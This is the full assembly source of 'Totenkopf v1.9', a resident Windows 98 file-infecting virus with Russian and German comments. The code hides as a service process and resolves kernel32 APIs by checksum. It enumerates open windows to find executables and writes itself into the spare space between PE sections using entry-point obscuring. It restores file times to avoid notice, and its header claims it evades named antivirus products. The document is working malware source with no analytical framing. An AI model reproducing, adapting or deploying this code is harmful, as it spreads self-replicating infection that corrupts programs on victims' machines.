; Name : Totenkopf ; Origin : Russia ; Platform : Win98 (not tested under Win95 and WinNT ) ; Resident : yes ; Polymorfic : no ; Payload : no ; Destructiv : no ; AV : don't finded by DrWęeb und AVP ; Optimized : not very gut ;Details : virii stays as hidden process in memory and from time to time ; seaches the windows using EnumWindows function then stores ; their names by GetWindowModuleFileName and infect them after ; closing. Virus uses the free space between program sections ; so it may not increase the program length. Virus uses EPO ; technics .386p .model flat,stdcall locals jumps extrn MessageBoxA:PROC ;extrn GetWindowModuleFileNameA:PROC extrn ExitProcess:PROC extrn GetWindowTextA:PROC .data st db 'hello' .code startr: pushad call @7881 @7881: pop ebp sub ebp,offset @7881 jmp second_start ; call MessageBoxA,0,offset mss2,offset mss1,0 mss1 db '[-=Win98.Totenkopf_v1.9=-]',0 mss2 db '[ Total length - ' mss6 db len/1000 mod 10+'0' mess3 db len/0100 mod 10+'0' mess4 db len/0010 mod 10+'0' mess5 db len/0001 mod 10+'0',' ]',0 len=offset snakee-offset start mess1 db 'shit',0 vonn: call ExitProcess,0 start: beg1: pop eax popad jmp ich_melde kolichestvo dd 0 ;kolichestvo kuskov coda adresa dd 7 dup (0) ;tipa eto kuski coda dlini dd 7 dup (0) ;eto ih dlina new_start dd 0 beg2: ich_melde: pushad call la la: pop ebp sub ebp,offset la mov ecx,dword ptr [kolichestvo+ebp] mov edi,dword ptr [new_start+ebp] xor ebx,ebx @1111: push ecx mov ecx,dword ptr [dlini+ebp+ebx] mov esi,dword ptr [adresa+ebp+ebx] rep movsb pop ecx add ebx,4 loop @1111 mov eax,dword ptr [new_start+ebp] add eax,second_start2-start call eax beg3: second_start2: pop eax second_start: ;---------------SETUP_OUR_SEH_________ call @7780 @7780: pop ebp sub ebp,offset @7780 call setup_seh mov esp,[esp+8] pop dword ptr fs:[0] pop eax jmp exit setup_seh: xor eax,eax push dword ptr fs:[eax] mov dword ptr fs:[eax],esp ;----------------FIND_KERNEL32_BASE___________ mov edx,dword ptr [esp+40] qwerty: dec edx cmp word ptr [edx],05a4ch jb qwerty cmp word ptr [edx],05a4eh ja qwerty movzx esi,word ptr [edx+3ch] cmp word ptr [edx+esi],'EP' jne qwerty ;-------------------FIND_APIZ(edx-kernel base)--------------- lea esi,[close+ebp] mov ecx,dword ptr [esi] mov ecx,24 zdf: push ecx push esi getapi: movzx edi,word ptr [edx+3ch] mov ebx,dword ptr [edx+edi+78h] add ebx,edx mov edi,dword ptr [ebx+20h] add edi,edx xor eax,eax as1: push edi mov edi,dword ptr [edi] add edi,edx ;edi points to currnet name asss: movzx ecx,word ptr [edi] cmp word ptr [esi],cx jne fgh xor ecx,ecx poisk: cmp byte ptr [edi],0 je isall push eax movzx eax,byte ptr [edi] add ecx,eax pop eax inc edi jmp poisk isall: cmp cx,word ptr [esi+2] je find fgh: inc eax pop edi add edi,4 jmp as1 find: pop ecx ; eax-num shl eax,1 add eax,dword ptr [ebx+24h] add eax,edx xor esi,esi xchg eax,esi lodsw shl eax,2 add eax,dword ptr [ebx+1ch] add eax,edx mov esi,eax lodsd add eax,edx pop esi pop ecx mov dword ptr [esi+4],eax add esi,8 loop zdf ;----------------FIND-USER32------ find_user32: call @144 db 'USER32',0 @144: call dword ptr [loada+ebp] mov esi,eax call @15534 db 'EnumWindows',0 @15534: push esi call dword ptr [getadra+ebp] mov dword ptr [EnumWindows+ebp],eax call @921 db 'GetWindowModuleFileN' commline db 'ameA',0 @921: push esi call dword ptr [getadra+ebp] mov dword ptr [GetWindowModuleFileNameA2+ebp],eax ;------------------------- lea eax,[atomn+ebp] push eax call [fndatoma+ebp] ;is atom already exist or eax,eax jnz exit ;;-----------RESTORE_SEH_________ pop dword ptr fs:[0] pop eax ;________END_RESTORE_SEH________ xor ebx,ebx push ebx push 3000 push ebx ;create heap call dword ptr [h1+ebp] or eax,eax jz exit push 2990 push 8 ;get some memory from heap push eax ;ripped from voodoo ;) call dword ptr [h2+ebp] mov dword ptr [memadr+ebp],eax call dword ptr [linea+ebp] ;get command line xchg eax,edi mov esi,edi mov ecx,150 mov eax,'Aema' ;is caoomand line smart? repne scasd je install mov edi,dword ptr [memadr+ebp] ;------- push edi inc esi mov ecx,250 push edi rep movsb pop edi ;transform comline to path mov ecx,250 mov al,'.' repne scasb and byte ptr [edi+3],0 pop edi ;-------- mov ebx,edi add ebx,270 push ebx add ebx,70 push ebx xor eax,eax push eax ;0 - currentdir push eax ;environment push eax ;flags push eax ;inherit handles push eax ;threads security push eax ;process security lea eax,[commline+ebp] push eax push edi call dword ptr [ebp+crproca] ;returns HANDLER exit: lea esi,[rezerv+ebp] mov edi,dword ptr [orghost+ebp] mov ecx,dlina rep movsb popad db 068h orghost dd offset vonn ; domoy ret ;************************************************** to_kasper_pig: db 13,13 db 'Wer mit Ungeheuern kompft, mag zusehn, dass er nicht dabei zum Ungeheuer' db ' wird. Und wenn du lange in einen Abgrund blickst, blickt der Abgrund auch' db ' in dich hinein.',13,13 enum_proc: pushad call @shitty @shitty: pop ebp sub ebp,offset @shitty mov edi,dword ptr [esp+4+32] cmp byte ptr [tip+ebp],0 jne @688 mov esi,dword ptr [num+ebp] imul esi,4 mov dword ptr [mass+ebp+esi],edi inc dword ptr [num+ebp] jmp @97 @688: mov esi,dword ptr [num2+ebp] imul esi,4 mov dword ptr [mass2+ebp+esi],edi inc dword ptr [num2+ebp] jmp quuit @97: mov eax,dword ptr [pathptr+ebp] push 250 mov esi,dword ptr [memadr+ebp] add esi,eax mov byte ptr [esi],0 inc esi push esi push edi call dword ptr [GetWindowModuleFileNameA2+ebp] inc eax add dword ptr [pathptr+ebp],eax quuit: popad ret ;************************************************** install: call @913 atomn db 13,13,'[-= Totenkopf v1.9 by ShiTz0r ' db 'Mo$cow Inst. of Beer&Alloys =-]',13,13,0 ;just a fakin sign @913: call dword ptr [addatoma+ebp] xor ebx,ebx mov byte ptr [flag+ebp],bl mov dword ptr [num+ebp],ebx call dword ptr [getpra+ebp] ;get current process mov esi,eax push 1 ; Register the current running push ebx ; process as a service. call dword ptr [regisa+ebp] push 100h ; realtime priority class push esi ; HANDLEof process call dword ptr [priora+ebp] @314: cmp byte ptr [flag+ebp],0 jne zanato ;is buzy now? inc byte ptr [flag+ebp] and byte ptr [tip+ebp],0 and dword ptr [num+ebp],0 and dword ptr [pathptr+ebp],0 call findpaths push 3000 call dword ptr [sleepa+ebp] mov byte ptr [tip+ebp],4 and dword ptr [num2+ebp],0 call findpaths ;ooooooooo is_closed: mov ecx,dword ptr [num+ebp] xor esi,esi @next: mov eax,dword ptr [mass+ebp+esi] pushad mov ecx,dword ptr [num2+ebp] xor esi,esi zuhen: cmp dword ptr [mass2+ebp+esi],eax je zaebca add esi,4 loop zuhen netu_bly: popad mov edx,esi shr edx,2 inc edx mov ebx,dword ptr [memadr+ebp] xor edi,edi loook: cmp byte ptr [ebx],0 je find_path ne_to: inc ebx jmp loook find_path: cmp byte ptr [ebx+1],0 je ne_to inc edi inc ebx cmp edi,edx jne loook ;oooooooooooooooo call infect_it jmp @999 zaebca: popad @999: add esi,4 loop @next @444: ;------------ joker: dec byte ptr [flag+ebp] zanato: jmp @314 doloy: call dword ptr [exitpr+ebp] ;------------------------------------ findpaths: pushad call @99 @99: pop ebp sub ebp,offset @99 push 0 lea eax,[enum_proc+ebp] push eax call dword ptr [EnumWindows+ebp] popad ret ;---------------------- infect_it: ;in ebx -path pushad chek_exe: mov ecx,260 mov esi,ebx is_exec: cmp byte ptr [esi],0 je nicht cmp dword ptr [esi],'exe.' je yes cmp dword ptr [esi],'EXE.' je yes vvb: inc esi loop is_exec yes: ; cmp dword ptr [esi-4],'WWWW' ;just for testing ; jne vvb ;____________SET_NORMAL_ATTRIBUTES_________ push 80h push ebx call dword ptr [atriba+ebp] ;__________WHO_KILLED_THE BAMBY?_____________________ call kill ;in ebx -path nicht: popad ret ;-------------------------- close dw 'lC' dw 'C'+'l'+'o'+'s'+'e'+'H'+'a'+'n'+'d'+'l'+'e' closea dd 0 pofinter dw 'eS' dw 'S'+'e'+'t'+'F'+'i'+'l'+'e'+'P'+'o'+'i'+'n'+'t'+'e'+'r' pointera dd 0 lofad dw 'oL' dw 'L'+'o'+'a'+'d'+'L'+'i'+'b'+'r'+'a'+'r'+'y'+'A' loada dd 0 getfadr dw 'eG' dw 'G'+'e'+'t'+'P'+'r'+'o'+'c'+'A'+'d'+'d'+'r'+'e'+'s'+'s' getadra dd 0 ;allfoc dw 'lG' ; dw 'G'+'l'+'o'+'b'+'a'+'l'+'A'+'l'+'l'+'o'+'c' ;alloca dd 0 opefn dw 'rC' dw 'C'+'r'+'e'+'a'+'t'+'e'+'F'+'i'+'l'+'e'+'A' opena dd 0 crfproc dw 'rC' dw 'C'+'r'+'e'+'a'+'t'+'e'+'P'+'r'+'o'+'c'+'e'+'s'+'s'+'A' crproca dd 0 lfine dw 'eG' dw 'G'+'e'+'t'+'C'+'o'+'m'+'m'+'a'+'n'+'d'+'L'+'i'+'n'+'e'+'A' linea dd 0 getfpr dw 'eG' dw 'G'+'e'+'t'+'C'+'u'+'r'+'r'+'e'+'n'+'t'+'P'+'r'+'o'+'c'+'e'+'s'+'s' getpra dd 0 regfis dw 'eR' dw 'R'+'e'+'g'+'i'+'s'+'t'+'e'+'r'+'S'+'e'+'r'+'v'+'i'+'c'+'e'+'P'+'r'+'o'+'c'+'e'+'s'+'s' regisa dd 0 priofr dw 'eS' dw 'S'+'e'+'t'+'P'+'r'+'i'+'o'+'r'+'i'+'t'+'y'+'C'+'l'+'a'+'s'+'s' priora dd 0 craftom dw 'lG' dw 'G'+'l'+'o'+'b'+'a'+'l'+'A'+'d'+'d'+'A'+'t'+'o'+'m'+'A' addatoma dd 0 fnfdatom dw 'lG' dw 'G'+'l'+'o'+'b'+'a'+'l'+'F'+'i'+'n'+'d'+'A'+'t'+'o'+'m'+'A' fndatoma dd 0 heapcr dw 'eH' dw 'H'+'e'+'a'+'p'+'C'+'r'+'e'+'a'+'t'+'e' h1 dd 0 hfeapal dw 'eH' dw 'H'+'e'+'a'+'p'+'A'+'l'+'l'+'o'+'c' h2 dd 0 dsad dw 'lS' dw 'S'+'l'+'e'+'e'+'p' sleepa dd 0 exxx dw 'xE' dw 'E'+'x'+'i'+'t'+'P'+'r'+'o'+'c'+'e'+'s'+'s' exitpr dd 0 atrr dw 'eS' dw 'S'+'e'+'t'+'F'+'i'+'l'+'e'+'A'+'t'+'t'+'r'+'i'+'b'+'u'+'t'+'e'+'s'+'A' atriba dd 0 sadfsdf dw 'rC' dw 'C'+'r'+'e'+'a'+'t'+'e'+'F'+'i'+'l'+'e'+'M'+'a'+'p'+'p'+'i'+'n'+'g'+'A' crtmap dd 0 sfdsfsd dw 'aM' dw 'M'+'a'+'p'+'V'+'i'+'e'+'w'+'O'+'f'+'F'+'i'+'l'+'e' mapfile dd 0 sadada dw 'nU' dw 'U'+'n'+'m'+'a'+'p'+'V'+'i'+'e'+'w'+'O'+'f'+'F'+'i'+'l'+'e' unmapa dd 0 asdsad dw 'eG' dw 'G'+'e'+'t'+'F'+'i'+'l'+'e'+'S'+'i'+'z'+'e' getsize dd 0 afgsg dw 'eS' dw 'S'+'e'+'t'+'E'+'n'+'d'+'O'+'f'+'F'+'i'+'l'+'e' setend dd 0 name1 dw 'eG' dw 'G'+'e'+'t'+'F'+'i'+'l'+'e'+'T'+'i'+'m'+'e' gettime dd 0 name2 dw 'eS' dw 'S'+'e'+'t'+'F'+'i'+'l'+'e'+'T'+'i'+'m'+'e' settime dd 0 ;-----------INFECTION_PROCEDURE---------------- kill: ;path in ebx xor eax,eax push eax ;null push 80h ;flags push 3 ;create push eax ;null push eax ;null ;open flesh push 80000000h or 40000000h push ebx call dword ptr [opena+ebp] jc exit1 mov dword ptr [mass+ebp],eax xchg eax,ebx lea eax,[datas+ebp] push eax add eax,8 push eax add eax,8 push eax push ebx call dword ptr [gettime+ebp] jc back lea eax,[size+ebp] push eax push ebx call dword ptr [getsize+ebp] jc exit3 xchg edi,eax mov dword ptr [size+ebp],edi add edi,20000 xor esi,esi push esi push edi push esi push 4 push esi push ebx call dword ptr [crtmap+ebp] or eax,eax jz back xchg eax,ebx push edi push esi push esi push 2 push ebx call dword ptr [mapfile+ebp] or eax,eax jz closemap xchg edi,eax cmp word ptr [edi],05a4ch jb unmap cmp word ptr [edi],05a4eh ja unmap movzx esi,word ptr [edi+3ch] cmp esi,1000 ja unmap cmp word ptr [esi+edi],'EP' jne unmap test dword ptr [esi+edi+22],2000h ;DLL ? jnz unmap ;aaaaaaaaaaaaaaaaaaaaaaaa movzx eax,word ptr [esi+edi+20] add eax,24 add eax,esi ;set the ptr to the first block ;tipa CODE add eax,edi ;poneslos lea ecx,[start+ebp] mov dword ptr [nachalo+ebp],ecx and byte ptr [flag2+ebp],0 mov edx,dword ptr [esi+edi+40] add edx,dword ptr [esi+edi+52] ;save orghost mov dword ptr [orghost+ebp],edx movzx ecx,word ptr [esi+edi+6] ;number of sections ;-------------------------- pushad mov edx,dword ptr [esi+edi+40] @333: cmp edx,dword ptr [eax+12] ;find the section with entry jb shitzzz mov dword ptr [smart+ebp],eax shitzzz: add eax,40 loop @333 popad ;----------------------------- mov eax,dword ptr [smart+ebp] mov edx,dword ptr [esi+edi+40] sub edx,dword ptr [eax+12] ;is already infected? add edx,dword ptr [eax+20] add edx,edi cmp word ptr [edx],9090h je unmap pushad and dword ptr [kolichestvo+ebp],0 ;obnulim kolichestvo sekciy xor ebx,ebx ich_suche: mov dword ptr [eax+36],0e0000040h cmp ecx,1 jne aaaa cmp byte ptr [flag2+ebp],1 je aaaa mov edx,dword ptr [eax+8] mov dword ptr [eax+16],edx ;equal sections lea edx,[snakee+ebp] sub edx,dword ptr [nachalo+ebp] ;v edx dlina poslednego kuska add dword ptr [eax+16],edx ;broden the last sect pushad mov ecx,dword ptr [eax+20] add ecx,dword ptr [eax+16] mov dword ptr [size+ebp],ecx popad jmp schweps aaaa: mov edx,dword ptr [eax+16] sub edx,dword ptr [eax+8] or edx,edx jz tufta jl tufta cmp edx,beg3-beg1 jb tufta schweps: cmp byte ptr [flag2+ebp],1 je tufta inc dword ptr [kolichestvo+ebp] cmp dword ptr [kolichestvo+ebp],1 jne qwe1 pushad mov edx,[eax+20] add edx,[eax+8] add edx,edi ;place to write mov dword ptr [govno+ebp],edx popad pushad mov edx,[eax+12] add edx,[eax+8] add edx,dword ptr [esi+edi+52] mov dword ptr [kuda2+ebp],edx popad call write_to_begin qwe1: mov edx,[eax+16] sub edx,[eax+8] mov dword ptr [dlini+ebp+ebx],edx call copy_it mov edx,dword ptr [eax+12] add edx,dword ptr [eax+8] add edx,dword ptr [esi+edi+52] mov dword ptr [adresa+ebp+ebx],edx mov edx,dword ptr [eax+16] mov dword ptr [eax+8],edx add ebx,4 ;qwe: ;???? tufta: add eax,40 loop ich_suche ;<><><> ;-------------------------------------------- mov dword ptr [new_start+ebp],eax popad mov eax,dword ptr [new_start+ebp] sub eax,40 mov edx,dword ptr [eax+12] add edx,dword ptr [eax+8] ;place to assemble the code add edx,dword ptr [esi+edi+52] mov dword ptr [new_start+ebp],edx ;-------------------------------------------- pushad mov ecx,beg2-beg1 lea esi,[start+ebp] mov edi,dword ptr [govno+ebp] ;copy inform section rep movsb popad ;-------------------------------------------- mov edx,snakee-start+5000 add dword ptr [eax+8],edx add dword ptr [eax+16],edx ;expand last section & image size add dword ptr [esi+edi+80],edx jmp unmap ;------------- write_to_begin: pushad mov ecx,dlina mov eax,dword ptr [smart+ebp] mov esi,dword ptr [edi+esi+40] sub esi,dword ptr [eax+12] add esi,dword ptr [eax+20] add esi,edi ;ptr to code section in file mov dword ptr [smart+ebp],esi lea edi,[rezerv+ebp] rep movsb mov ecx,dlina mov edi,dword ptr [smart+ebp] lea esi,[kuda1+ebp] rep movsb popad ret ;========== copy_it: pushad mov esi,dword ptr [nachalo+ebp] mov ecx,edx mov ebx,dword ptr [eax+20] add ebx,dword ptr [eax+8] add ebx,edi mov edi,ebx lea ebx,[snakee+ebp] just_a_bucker: cmp esi,ebx ja na_huy lodsb stosb loop just_a_bucker jmp okkk na_huy: mov byte ptr [flag2+ebp],1 okkk: mov dword ptr [nachalo+ebp],esi popad ret ;-------------------------------------------- unmap: push edi call dword ptr [unmapa+ebp] closemap: push ebx call dword ptr [closea+ebp] mov ebx,dword ptr [mass+ebp] xor eax,eax push eax push eax db 068h size dd 0 ;set pointer to cutting place push ebx call dword ptr [pointera+ebp] jc back push ebx ;cut the file call dword ptr [setend+ebp] back: lea eax,[datas+ebp] push eax add eax,8 push eax add eax,8 push eax push dword ptr [mass+ebp] call dword ptr [settime+ebp] exit3: push dword ptr [mass+ebp] call dword ptr [closea+ebp] exit1: ret ;<><><><><><><><><><><><>< rezerv db dlina dup (0) kuda1: nop nop pushad mov ebx,esp sub ebx,50 mov edi,ebx mov al,68h stosb db 0b8h kuda2 dd 0 stosd mov al,0c3h stosb call ebx kuda3: dlina=$-kuda1 snakee: nachalo dd 0 govno dd 0 flag2 db 0 datas dd 6 dup (0) smart dd 0 EnumWindows dd 0 GetWindowModuleFileNameA2 dd 0 flag dd 0 memadr dd 0 num dd 0 num2 dd 0 tip db 0 pathptr dd 0 mass dd 150 dup (?) mass2 dd 150 dup (?) ;snakee: end startr